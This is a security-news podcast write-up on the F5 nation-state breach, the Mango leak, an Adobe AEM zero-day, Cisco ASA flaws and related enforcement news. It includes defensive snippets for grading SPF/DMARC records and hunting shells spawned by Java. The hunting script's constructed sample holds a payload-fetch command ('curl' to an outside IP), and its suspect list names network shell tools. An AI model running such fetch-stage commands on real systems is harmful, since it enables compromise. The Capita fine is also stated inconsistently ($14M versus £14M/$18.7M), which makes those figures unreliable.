CISO Talk by James Azar
CyberHub Podcast
F5 Nation-State Breach, Source Code Theft, and the China Connection, Mango Data Breach, Adobe Experience Exploit & Cisco Under Fire

Episode 995: F5's SolarWinds Moment, Chinese APT Persistence, Senate Cisco Scrutiny, and $14M in Breach Consequences

Good Morning Security Gang!
Happy Thursday, October 16th, 2025, and welcome back to the CyberHub Podcast. I’ve got my double shot ready, still piping hot, and we’ve got a massive show today.

F5 has confirmed a major nation-state breach that exposed Big-IP source code and internal vulnerabilities, Mango has disclosed a customer data leak through a marketing partner, and the UK’s ICO just fined Capita $14 million after a catastrophic breach that impacted over 6.6 million people.

Plus, we’ve got fresh vulnerabilities across Adobe, Fortinet, Avanti, Siemens, and Cisco — and even some good old-fashioned legal action out of Florida and Massachusetts showing that accountability is finally catching up with cybercrime.

Buckle up, Security Gang — this one’s loaded. ☕

🧱 F5 Breach Exposes Source Code in Nation-State Attack

We kick off with a major cybersecurity breach at F5 Networks, the makers of Big-IP, after attackers maintained long-term persistence inside the company’s engineering systems and exfiltrated source code and undisclosed vulnerability data.
The breach — confirmed by F5 and attributed to China’s UNC5221 (aka “Brickstorm”) — gave the attackers insight into Big-IP logic flaws and zero-days, potentially enabling follow-on exploitation. F5 says there’s no evidence of supply-chain compromise or current RCE exploitation but has rotated signing keys, patched dozens of Big-IP vulnerabilities, and is accelerating internal security reviews.

CISA and the UK’s NCSC issued joint alerts, warning that access to F5’s source code provides attackers a “head start” on weaponizing flaws before vendors can patch them.

I said it bluntly on the show:

“This is SolarWinds all over again — except this time it’s on the security side of the house.”

F5’s investigation involves Mandiant, CrowdStrike, and Google TAG, all confirming the attack’s connection to Chinese state interests. The U.S. and UK governments are bracing for potential Big-IP scanning surges and exploitation attempts over the next 90 days.

My advice:

  • Treat every Big-IP system as mission critical.

  • Audit logs for lateral movement and exfiltration indicators.

  • Patch, harden, and enable deep monitoring immediately.

👗 Mango Confirms Customer Data Leak via Marketing Partner

Spanish fashion retailer Mango is notifying customers about a data breach involving a compromised marketing service provider. Exposed data includes first names, country, postal code, email addresses, and phone numbers — though Mango confirmed no payment data or passwords were compromised.
The brand, headquartered in Barcelona, operates in over 120 countries, and this breach could lead to phishing or smishing attacks against loyalty members and newsletter subscribers.
I told listeners, “Expect a wave of fake Mango promo codes, discounts, and look-alike emails — especially targeting users in Europe.”
If you or your organization partners with Mango, now’s the time to tighten DMARC and SPF, and prepare for potential supply-chain phishing.
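To make the DMARC and SPF advice concrete, here is an added example (not from the show, and not any retailer's real DNS) that grades the TXT records a sending domain publishes and puts a weak pair beside the hardened pair; the records and domain names are constructed.

```python
"""Grade the SPF and DMARC records a sending domain publishes, to see how far
spoofed "promo code" mail would get. Records below are constructed examples;
fetch live ones with `dig TXT <domain>` and `dig TXT _dmarc.<domain>`."""


def parse_tags(record):
    # "v=DMARC1; p=none; rua=mailto:x" -> {"v": "DMARC1", "p": "none", "rua": ...}
    return {k.strip().lower(): v.strip() for k, v in
            (p.split("=", 1) for p in record.split(";") if "=" in p)}


def grade_spf(record):
    """Return a list of weaknesses; an empty list means unlisted senders fail."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ["no SPF record"]
    issues = []
    if "+all" in terms or "?all" in terms or "all" in terms:
        issues.append("all mechanism accepts any sender")
    elif "~all" in terms:
        issues.append("~all softfail: spoofed mail is still delivered, only marked")
    elif "-all" not in terms:
        issues.append("no terminal -all: unlisted senders are treated as neutral")
    return issues


def grade_dmarc(record):
    """Return a list of weaknesses; an empty list means reject with reporting."""
    tags = parse_tags(record)
    if tags.get("v", "").upper() != "DMARC1":
        return ["no DMARC record"]
    issues = []
    policy = tags.get("p", "none")
    if policy == "none":
        issues.append("p=none: failures are only reported, never blocked")
    elif policy == "quarantine":
        issues.append("p=quarantine: spoofed mail lands in spam; move to p=reject")
    if int(tags.get("pct", "100")) < 100:
        issues.append(f"pct={tags['pct']}: policy applied to only part of the mail")
    if "rua" not in tags:
        issues.append("no rua: no aggregate reports, so abuse goes unseen")
    return issues


# Constructed records: the weak pair beside the hardened pair.
WEAK_SPF = "v=spf1 include:_spf.mailer.example ~all"
WEAK_DMARC = "v=DMARC1; p=none; pct=50"
STRONG_SPF = "v=spf1 include:_spf.mailer.example -all"
STRONG_DMARC = "v=DMARC1; p=reject; rua=mailto:dmarc@retailer.example; adkim=s; aspf=s"
```

Run `grade_spf` and `grade_dmarc` over your own and your marketing partner's records; anything they return is a gap a look-alike campaign can use.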

💻 Adobe AEM Zero-Day Added to KEV

Yesterday, CISA added Adobe CVE-2025-54253 to the Known Exploited Vulnerabilities (KEV) catalog — confirming active exploitation in the wild.
This critical bug affects Adobe Experience Manager (AEM) Forms 6.5.13 stream, enabling unauthorized code execution via public form portals. Threat actors are reportedly using this to deploy web shells, data-theft payloads, and ransomware stagers.
Adobe released a fix earlier this week, but exploitation began shortly thereafter.

“If you’re running AEM, assume compromise and start hunting child Java processes — this is the new SharePoint moment,” I warned.
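Following the hunting advice above, here is an added example (not from the show or from Adobe) that flags shell and download-tool processes descending from a Java process; the SAMPLE snapshot is constructed, and live_snapshot() assumes a Linux host with /proc.

```python
"""Flag shell/download-tool processes descending from a Java process (the AEM
post-exploitation pattern). SAMPLE is constructed; live_snapshot() reads /proc."""
import os
from collections import namedtuple

SUSPECT = {"sh", "bash", "dash", "zsh", "ksh",                          # shells
           "curl", "wget", "nc", "ncat", "python3", "perl", "base64"}   # droppers/recon
Proc = namedtuple("Proc", "pid ppid comm cmdline")   # comm = name in /proc/<pid>/stat


def hunt(procs, max_depth=10):
    """Return (pid, comm, java_pid) for each suspect process with a java ancestor."""
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        if p.comm not in SUSPECT:
            continue
        ancestor, hops = by_pid.get(p.ppid), 0
        while ancestor is not None and hops < max_depth:
            if ancestor.comm == "java":
                findings.append((p.pid, p.comm, ancestor.pid))
                break
            ancestor, hops = by_pid.get(ancestor.ppid), hops + 1
    return findings


def live_snapshot():
    procs = []
    for d in (d for d in os.listdir("/proc") if d.isdigit()):
        try:
            with open(f"/proc/{d}/stat") as f, open(f"/proc/{d}/cmdline", "rb") as g:
                stat, cmd = f.read(), g.read().replace(b"\0", b" ")
        except OSError:
            continue   # process exited mid-read
        comm = stat[stat.index("(") + 1:stat.rindex(")")]
        ppid = int(stat[stat.rindex(")") + 2:].split()[1])   # "... ) S <ppid> ..."
        procs.append(Proc(int(d), ppid, comm, cmd.decode(errors="replace").strip()))
    return procs


# Constructed: AEM (pid 1200) spawned a shell that fetched a file; the admin's
# bash under sshd (pid 1301) is benign and must not be flagged.
SAMPLE = [
    Proc(1, 0, "systemd", "/sbin/init"),
    Proc(1200, 1, "java", "java -jar cq-quickstart-6.5.0.jar"),
    Proc(1300, 1, "sshd", "/usr/sbin/sshd -D"),
    Proc(1301, 1300, "bash", "-bash"),
    Proc(2100, 1200, "sh", "sh -c curl -s http://203.0.113.5/stage"),
    Proc(2101, 2100, "curl", "curl -s http://203.0.113.5/stage"),
]

if __name__ == "__main__":
    print(hunt(SAMPLE))   # -> [(2100, 'sh', 1200), (2101, 'curl', 1200)]
```

On a real AEM host, swap `hunt(SAMPLE)` for `hunt(live_snapshot())` and run it from cron or your EDR's script runner; every finding is a process chain worth pulling into the incident timeline.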

🧠 Fortinet, Ivanti, and ICS Vendors Push Emergency Fixes

Fortinet and Ivanti are both in rapid patch mode, releasing 30+ advisories each to address high-severity flaws:

  • FortiDLP and FortiClient Mac: Command execution and authorization bypasses.

  • Ivanti EPMM and Neurons MDM: MFA bypass and arbitrary enrollment flaws.

While no active exploitation is confirmed yet, these are high-value targets for Chinese and Russian operators — particularly in light of F5’s recent breach.

Meanwhile, Siemens, Schneider Electric, ABB, Rockwell, and Phoenix Contact all released over 20 new ICS advisories, including unauthorized control operations, DoS, and credential exposure risks. Rockwell’s 1783 NATR router vulnerability was rated critical due to admin takeover and NAT rule tampering.

🧱 Cisco Faces Senate Scrutiny Over ASA Flaws

U.S. Senator Bill Cassidy has demanded an explanation from Cisco CEO Chuck Robbins regarding two critical ASA vulnerabilities — CVE-2025-30333 and CVE-2025-20362 — after reports emerged that at least one federal agency was breached via Cisco infrastructure.
Cassidy, who chairs the Senate Committee on Health, Education, Labor, and Pensions, cited inadequate vendor communication and delayed mitigation guidance.
While Cisco has issued emergency patches, both Canada and the UK’s NCSC have also issued threat alerts tied to the same CVEs.
This is another wake-up call for vendors: “Ship secure code, or Washington will make you.”

💾 Capita Fined $14M for Data Breach Impacting 6.6 Million People

The UK’s Information Commissioner’s Office (ICO) fined Capita £14 million ($18.7 million USD) for its mishandling of a 2023 ransomware breach that compromised 6.6 million individuals’ data, including retirement records and personal identifiers.
Originally facing a £45 million fine, Capita’s penalty was reduced due to its remediation efforts — though the ICO criticized the company for taking 58 hours to isolate infected systems, enabling extensive lateral movement by the Black Basta ransomware group.
The breach’s victims include hundreds of pension administrators and retirement plan providers.

I said:

“That fine isn’t going to victims — it’s going straight to government coffers. But maybe it’ll finally push companies to isolate faster.”

🧒 Florida Sues Roku for Monetizing Kids’ Data

The Florida Attorney General filed a civil enforcement action against Roku, alleging unlawful monetization of children’s precise geolocation data under the Florida Digital Bill of Rights and the Deceptive and Unfair Trade Practices Act.
This case follows similar actions in Texas and Utah, signaling that state-level data privacy enforcement is accelerating beyond California.
It’s a reminder that regulators are watching how data brokers and streaming platforms track underage users.

👨‍💻 Massachusetts Cyber Criminal Sentenced to 4 Years in Prison

Finally, Matthew Lane, the Massachusetts hacker behind the PowerSchool breach, has been sentenced to four years in federal prison and ordered to pay $14 million in restitution. Lane hacked multiple educational software systems and extorted companies after stealing data on 70 million students.
He also received three years of supervised release following his sentence. Justice — for once — actually delivered.

🧠 James Azar’s CISO Take

Today’s stories underscore a growing reality: our defensive tools are becoming offensive weapons. The F5 breach is a critical reminder that when adversaries compromise the defenders, they inherit blueprints for global exploitation. Just like SolarWinds and Microsoft in 2021, this F5 incident will have long-tail consequences. Chinese operators will be racing the patch clock to weaponize what they stole — which means defenders have to move faster than ever before.

At the same time, stories like Capita, Mango, and Roku prove that governance, accountability, and vendor hygiene are just as vital as patching. We’re not just securing networks anymore — we’re managing ecosystems of trust. CISOs must keep driving the message up the chain: cyber risk is business risk. It’s not about fear; it’s about readiness.

✅ Action Items

  • 🧱 Audit and patch all F5 Big-IP systems; enable anomaly detection and segmentation.

  • 👗 Prepare for phishing campaigns using Mango breach data; validate marketing provider access.

  • 💻 Apply Adobe AEM (CVE-2025-54253) patch immediately; monitor for child Java processes.

  • ⚙ Patch Fortinet, Ivanti, and ICS advisories; review VPN and OT segmentation.

  • 🧱 Validate Cisco ASA patch status (CVE-2025-30333 / 20362).

  • 💾 Review breach isolation policies and recovery SLAs; use Capita as a tabletop case.

  • 🧒 Audit your organization’s data broker and tracking compliance under new state laws.

  • 👨‍💻 Educate staff on phishing and data extortion trends tied to breach fallout.


And that’s a wrap for today’s show, Security Gang — patch smart, stay resilient, and as always, stay cyber safe! ☕👊
